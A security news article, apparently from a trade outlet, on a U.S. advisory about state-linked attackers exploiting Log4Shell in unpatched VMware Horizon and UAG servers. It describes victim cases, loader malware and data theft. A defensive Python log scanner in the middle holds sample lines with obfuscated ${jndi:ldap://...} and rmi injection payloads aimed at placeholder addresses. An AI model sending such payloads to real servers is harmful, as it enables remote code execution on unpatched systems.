Attackers Use Log4Shell to Hack Unpatched VMware Products
Unpatched Systems Should Be Treated as Compromised, Say U.S. Cyber Agencies
System administrators who haven't yet patched the Log4Shell vulnerability could get a rude awakening in the form of state-sponsored hacking, warns the U.S. government.
A joint advisory from the Cybersecurity and Infrastructure Security Agency and the Coast Guard Cyber Command says advanced persistent threat actors are exploiting the vulnerability to break into unpatched VMware virtual desktop software.
Security researchers set off a firestorm late last year when they discovered a zero-day vulnerability in Log4j, a popular open-source Java logging library present in hundreds of millions of devices. A patch released by the Apache Software Foundation in December set off a global race between systems administrators and hackers - a sprint that some organizations, dangerously, have yet to complete (see: Serious Log4j Security Flaw: Race Underway to Discern Scope).
Multiple threat actors intent on taking advantage of this moment are using Log4Shell to penetrate unpatched VMware Horizon and Unified Access Gateway systems, the advisory says. Some load malware with embedded executables that establish a remote connection to a command-and-control server. In one confirmed compromise detailed in the advisory, attackers gained entry into a sensitive network via a vulnerable instance of VMware Horizon and exfiltrated sensitive law enforcement data.
Any VMware system that has not been updated with the Log4Shell patch or that hasn't been modified with a workaround should be treated as already compromised, CISA and the Coast Guard Cyber Command say.
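One practical first step when deciding whether an unpatched Horizon or UAG host has been probed is to search the front-end and proxy logs for the JNDI lookup strings that Log4Shell exploitation relies on. Attackers rarely send the plain form, so the search has to undo URL encoding and collapse the nested Log4j lookups (${lower:j}, ${::-j} and similar) that defeat naive string matching. The detector below is an added example written for this article, not code from the advisory or from VMware; the access log lines it scans are constructed to resemble Tomcat-style logs and the IP addresses and paths in them are placeholders.

```python
import re
from urllib.parse import unquote

# Log4j 2 lookup forms used to hide "${jndi:" from naive string matching:
#   ${lower:J} / ${upper:j}       case-changing lookups that yield one character
#   ${::-j}, ${env:NOPE:-j}, ...  default-value syntax that also yields "j"
# Neither pattern allows nested braces, so repeated substitution resolves the
# innermost lookup first, the same order Log4j's own substitutor uses.
CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}$]*)\}", re.IGNORECASE)
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}$]*?:-([^{}$]*)\}")
# The form we are ultimately looking for: ${jndi:<scheme>:...}
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)


def _resolve_case(m: re.Match) -> str:
    return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo URL encoding and collapse nested lookups until the text stops changing."""
    for _ in range(max_rounds):
        step = unquote(text)
        step = CASE_LOOKUP.sub(_resolve_case, step)
        step = DEFAULT_LOOKUP.sub(r"\1", step)
        if step == text:
            break
        text = step
    return text


def jndi_scheme(text: str):
    """Return the JNDI scheme (ldap, rmi, dns, ...) if a lookup is present, else None."""
    m = JNDI_LOOKUP.search(normalize(text))
    return m.group(1).lower() if m else None


def scan(lines):
    """Return one hit per log line that carries a JNDI lookup after normalization."""
    hits = []
    for n, line in enumerate(lines, 1):
        scheme = jndi_scheme(line)
        if scheme:
            hits.append({"line": n, "scheme": scheme, "normalized": normalize(line)})
    return hits


# Constructed Tomcat-style access log lines (not from the advisory). The payload
# sits in the User-Agent or the query string, where a reverse proxy or access log
# records it verbatim even though a vulnerable Log4j would have evaluated it.
SAMPLE_LINES = [
    '10.0.0.5 - - [23/Jun/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [23/Jun/2022:10:01:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [23/Jun/2022:10:01:04 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [23/Jun/2022:10:01:05 +0000] "GET /portal/?x=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7Ddi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '10.0.0.7 - - [23/Jun/2022:10:01:06 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${env:JAVA_HOME}"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print(f"line {hit['line']}: jndi/{hit['scheme']} -> {hit['normalized']}")
```

Two caveats matter when reading the output. First, a hit only proves an attempt reached the host; whether it succeeded depends on the Log4j version behind the front end, which is why the agencies say to treat any unpatched system as compromised regardless. Second, no hits is not a clean bill of health: logs written by Log4j itself contain the evaluated lookup rather than the raw string, and the advisory's cases involved actors who had been inside for weeks, so host-level hunting for the loaders it names still has to follow.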
Check out this joint #cybersecurity advisory from @CISAgov & @USCG Cyber detailing cyber threat actors exploiting a #Log4Shell vulnerability in VMware Horizon® and Unified Access Gateway (UAG) servers to obtain access to victim networks. https://t.co/JYA5Ioz1fG pic.twitter.com/Do8qGI3YrW
- JenEasterly (@CISAJen) June 23, 2022
The advisory illustrates an all-too-common trajectory of vulnerabilities, says Kumar Saurabh, chief executive and co-founder of cybersecurity firm LogicHub. Initial discovery leads to a burst of patching that still doesn't reach every affected system, he tells Information Security Media Group. Then the vulnerability drops from view until hackers nudge it back into awareness.
"Vulnerabilities can stay around for a long time and continue to be exploited as long as there are gaps. It's critical that we remain vigilant about any exploit, even if it's been checked off the list as 'done,'" he says.
Victim Analysis 1: Highest Privilege Level
Threat hunting carried out by the U.S. Coast Guard Cyber Command shows that threat actors exploited Log4Shell to gain initial access to an undisclosed victim's network. They uploaded a malware file, "hmsvc.exe," that masquerades as a Microsoft Windows security utility.
An embedded executable inside the malware contains several capabilities, including keystroke logging and deployment of additional payloads, and provides a graphical user interface for accessing the victim's Windows desktop. It can also function as a command-and-control tunnelling proxy, allowing a remote operator to move further into the network, the agencies say.
The analysis also found that hmsvc.exe ran as a local SYSTEM account with the highest possible level of privileges, but it does not explain how the attackers elevated their privileges to that point.
Victim Analysis 2: Multiple Attackers
Incident response activity by CISA found that multiple threat groups had compromised the network of an undisclosed organization with access to law enforcement data.
The U.S. government is not disclosing the number of threat actors, and it is unclear if they shared access details or used an access broker. One of the threat actors gained access to the organization's network in January or perhaps earlier.
Once inside the production environment, threat actors used PowerShell scripts to move laterally to other production hosts and servers. They leveraged compromised administrator accounts to run loader malware that appears to have capabilities similar to the malware identified by the Coast Guard. Because multiple actors had access to the network, CISA found several Windows loaders with malicious embedded executables, including SvcEdge.exe, odbccads.exe, praiser.exe, fontdrvhosts.exe, and winds.exe.
The C2 capabilities of the embedded executables include the ability to remotely monitor a system's desktop, gain reverse shell access, exfiltrate data, and upload and execute additional payloads, the agencies say.
One threat actor had access to the victim's production environment for three weeks and exfiltrated more than 130 gigabytes of data from its security management server. The agency found .rar archive files "containing sensitive law enforcement investigation data under a known compromised administrator account."